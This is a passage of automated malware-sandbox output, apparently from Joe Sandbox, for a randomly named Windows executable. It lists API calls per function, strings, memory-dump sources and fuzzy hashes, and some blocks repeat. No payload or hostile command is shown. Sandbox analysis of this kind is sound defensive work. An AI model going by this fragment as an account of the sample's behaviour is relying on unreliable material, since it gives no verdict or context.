                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetEndOfFile.KERNELBASE(?,0036903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00369F0C
                                                                                        Similarity
                                                                                        • API ID: File
                                                                                        • String ID:
                                                                                        • API String ID: 749574446-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0037C2B1
                                                                                        • EndDialog.USER32(?,00000006), ref: 0037C2C4
                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 0037C2E0
                                                                                        • SetFocus.USER32(00000000), ref: 0037C2E7
                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 0037C321
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0037C358
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0037C36E
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C38C
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C39C
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C3B8
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C3D4
                                                                                        • _swprintf.LIBCMT ref: 0037C404
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0037C417
                                                                                        • FindClose.KERNEL32(00000000), ref: 0037C41E
                                                                                        • _swprintf.LIBCMT ref: 0037C477
                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 0037C48A
                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0037C4A7
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0037C4C7
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C4D7
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C4F1
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C509
                                                                                        • _swprintf.LIBCMT ref: 0037C535
                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0037C548
                                                                                        • _swprintf.LIBCMT ref: 0037C59C
                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 0037C5AF
                                                                                          • Part of subcall function 0037AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
                                                                                          • Part of subcall function 0037AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                        • String ID: %s %s$%s %s %s$P7$REPLACEFILEDLG
                                                                                        • API String ID: 797121971-618955506
                                                                                        • Opcode ID: 4a36d9305bab99e8b1d66d943a97fdac5bbdc4d436a134b0c5142abf43c87fe2
                                                                                        • Instruction ID: f61cd2cb42d4e5ee8e183849cc0644f6a614b6b7b071b11c346723ea2d26d3d0
                                                                                        • Opcode Fuzzy Hash: 4a36d9305bab99e8b1d66d943a97fdac5bbdc4d436a134b0c5142abf43c87fe2
                                                                                        • Instruction Fuzzy Hash: 2C919672148348BFD633EBA4CC49FFB77ACEB4A704F048819F649D6091D775AA048B62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00366FAA
                                                                                        • _wcslen.LIBCMT ref: 00367013
                                                                                        • _wcslen.LIBCMT ref: 00367084
                                                                                          • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                          • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                          • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                          • Part of subcall function 0036A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1
                                                                                          • Part of subcall function 0036A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00367139
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00367155
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00367298
                                                                                          • Part of subcall function 00369DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
                                                                                          • Part of subcall function 00369DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70
                                                                                          • Part of subcall function 00369620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 2821348736-3508440684
                                                                                        • Opcode ID: eb814e16ad799b9f54c873b9194338ade8f3833c9cedce4f63d02ade62ffb98d
                                                                                        • Instruction ID: 6f499d96adb8e1d1ff0ad073340ff1cd7a2e49af8aea03cf4381ae7f151d15dd
                                                                                        • Opcode Fuzzy Hash: eb814e16ad799b9f54c873b9194338ade8f3833c9cedce4f63d02ade62ffb98d
                                                                                        • Instruction Fuzzy Hash: 5EC109B5D04604AADB23DB74CC42FEFB3ACAF04304F40855AF956EB286D734AA44CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: __floor_pentium4
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 4168288129-2761157908
                                                                                        • Opcode ID: 76822b3ae1ac756fa6ae0a95636ff24416615369e9daba5da811f5fceb519407
                                                                                        • Instruction ID: 127c8040975b9f16711afbff47ad6874f6ea9d25a5383164c9377365a7a7797d
                                                                                        • Opcode Fuzzy Hash: 76822b3ae1ac756fa6ae0a95636ff24416615369e9daba5da811f5fceb519407
                                                                                        • Instruction Fuzzy Hash: 1BC23E71E046288FDB66EF28DD407E9B7B9EB84305F1541EAD44DE7280E775AE818F40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog_swprintf
                                                                                        • String ID: CMT$h%u$hc%u
                                                                                        • API String ID: 146138363-3282847064
                                                                                        • Opcode ID: 1929cdbeec668f6550241cc6775bc11f1f15d0d91fbbdf734f1fa67ca8e5a630
                                                                                        • Instruction ID: bb0a140c8574d68a9bfe5ab402b53c63367ee23ed4ce000f91a3d293616e21c3
                                                                                        • Opcode Fuzzy Hash: 1929cdbeec668f6550241cc6775bc11f1f15d0d91fbbdf734f1fa67ca8e5a630
                                                                                        • Instruction Fuzzy Hash: AB32D6715143849FDF16DF74C895AEA3BA5AF15300F08847DFD8A8F28ADB749A49CB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00362874
                                                                                        • _strlen.LIBCMT ref: 00362E3F
                                                                                          • Part of subcall function 003702BA: __EH_prolog.LIBCMT ref: 003702BF
                                                                                          • Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010420), ref: 00371BA0
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00362F91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                        • String ID: CMT
                                                                                        • API String ID: 1206968400-2756464174
                                                                                        • Opcode ID: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
                                                                                        • Instruction ID: d5c001998c3061f9b24ddc0f996a5fc3f251ec19454517dfdaeeafc81a8a52ab
                                                                                        • Opcode Fuzzy Hash: 234f2cc8a8809684306c40af38ff8f9b87da435e14b2703cdd8b9863459b3f4a
                                                                                        • Instruction Fuzzy Hash: 9B6227715006448FDB1ADF38C8966FA3BA1EF55300F09C47EEC9A8F28ADB759945CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0037F844
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0037F910
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0037F930
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0037F93A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 254469556-0
                                                                                        • Opcode ID: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
                                                                                        • Instruction ID: b24af11cee9d846d08aeeae125d6f8bcb34ebc56a5e067c578b1de17f0012201
                                                                                        • Opcode Fuzzy Hash: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
                                                                                        • Instruction Fuzzy Hash: 31311AB5D05219DFDB21EFA4D9897CDBBB8BF04304F1040AAE50CAB250EB759B848F45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualQuery.KERNEL32(80000000,0037E5E8,0000001C,0037E7DD,00000000,?,?,?,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6B4
                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6CF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                        • String ID: D
                                                                                        • API String ID: 401686933-2746444292
                                                                                        • Opcode ID: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
                                                                                        • Instruction ID: 2b8fb05748abead62fe0d416e77b48996d2d1be235aecf1756d1a7c6145b4b72
                                                                                        • Opcode Fuzzy Hash: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
                                                                                        • Instruction Fuzzy Hash: DA01F77260010D6BDB24DE29DC09BDD7BAAAFC8329F0DC161ED1DD7154D638D9058680
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00388FB5
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00388FBF
                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00388FCC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
                                                                                        • Instruction ID: 040a6fe47325f5c364534f76c2c2bc3ebffdbd0dfc27cc14ec06d586a77e5c40
                                                                                        • Opcode Fuzzy Hash: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
                                                                                        • Instruction Fuzzy Hash: CF31C8759013189BCB22DF64DC8979DBBB8BF08310F5041EAE41CA7250EB759F858F44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                        • Instruction ID: 6cfbd4251c47ee5fbd4f20dcd2e9f0ca8d9a5e4de5d63df66b5748d927bf6c80
                                                                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                        • Instruction Fuzzy Hash: 99021C71E002199FDF15DFA9D8806ADB7F1EF48314F2581AAE919EB384D731AD418B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84
                                                                                        Similarity
                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                        • String ID:
                                                                                        • API String ID: 2169056816-0
                                                                                        • Opcode ID: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
                                                                                        • Instruction ID: 78598a27b9ceafb58ce985fa673382e465eb1b2023a26af5459a2cce98db0376
                                                                                        • Opcode Fuzzy Hash: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
                                                                                        • Instruction Fuzzy Hash: DA01717A140308AEDB12DFA4EC45F9A77BCEF08714F009022FB0597161D3709955CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00366DDF,00000000,00000400), ref: 00366C74
                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00366C95
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
                                                                                        • Instruction ID: 03283c36bf37d9575419021758afd39c49ad9d3911834df43911fdf883e8c573
                                                                                        • Opcode Fuzzy Hash: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
                                                                                        • Instruction Fuzzy Hash: BBD0C971344300BFFA120B628D07F6A7B9DBF45B91F18C405B796E80E0CAB59824E629
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003919EF,?,?,00000008,?,?,0039168F,00000000), ref: 00391C21
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID:
                                                                                        • API String ID: 3997070919-0
                                                                                        • Opcode ID: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
                                                                                        • Instruction ID: 325c1d1a1ea818dc26eda27474ba45dfbc873fb374cb532af60ccecc94643b4d
                                                                                        • Opcode Fuzzy Hash: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
                                                                                        • Instruction Fuzzy Hash: D8B15C3521060A9FDB16CF28C48AB657BE1FF45364F268698E89ADF2A1C335DD91CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0037F66A
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 2325560087-0
                                                                                        • Opcode ID: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
                                                                                        • Instruction ID: fd9dc0d7806cd7906a3a9fa1bfffe9e09883ed2ac0b642939ae185f2c9d1cb65
                                                                                        • Opcode Fuzzy Hash: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
                                                                                        • Instruction Fuzzy Hash: 565181B1900605CFEB2ACF94D8857AAB7F8FB48354F25853AD409EB251D379ED00CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
                                                                                        • Instruction ID: d0c2502b561adab96f36d38a5d89da72d4ca0b7aa0635bf75f4bc2e0e0a09324
                                                                                        • Opcode Fuzzy Hash: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
                                                                                        • Instruction Fuzzy Hash: FFF03AB4E00218DFDB1ACB18EC926DA73F9FB8A315F114296D91693390C3B0A9C48E60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gj
                                                                                        • API String ID: 0-4203073231
                                                                                        • Opcode ID: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
                                                                                        • Instruction ID: b1ae66b1c1048837e7a341d1219d59ea3c84150f310991fbf1baa53e54282874
                                                                                        • Opcode Fuzzy Hash: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
                                                                                        • Instruction Fuzzy Hash: 89C137B6A183418FC354CF29D89065AFBE1BFC8308F19892DE998D7311D734E949CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0037F3A5), ref: 0037F9DA
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
                                                                                        • Instruction ID: 1792c0a2e0302bc17e3b88a26aec8b67dd7a7b01ccd496880558769e347e56ba
                                                                                        • Opcode Fuzzy Hash: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
                                                                                        • Instruction ID: 9ab79297a62fbc30280236ab9e85274a915ab427ccad4bba9e23498551e69d84
                                                                                        • Opcode Fuzzy Hash: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
